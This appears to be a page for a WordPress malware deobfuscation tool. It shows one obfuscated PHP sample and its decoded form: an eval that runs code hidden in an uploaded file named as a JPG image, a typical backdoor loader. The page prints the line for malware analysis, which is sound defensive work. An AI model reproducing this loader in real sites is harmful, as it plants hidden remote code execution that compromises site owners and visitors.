Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php eval(file_get_contents(base64_decode('d3AtY29udGVudC91cGxvYWRzLzIwMjIvMDYv5ZuzMy0xNTB4MTUwbS5qcGc=')));...



Obfuscated php code

<?php eval(file_get_contents(base64_decode('d3AtY29udGVudC91cGxvYWRzLzIwMjIvMDYv5ZuzMy0xNTB4MTUwbS5qcGc=')));

Decoded(de-Obfuscated) php code

<?php

eval(file_get_contents("wp-content/uploads/2022/06/図3-150x150m.jpg"));


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.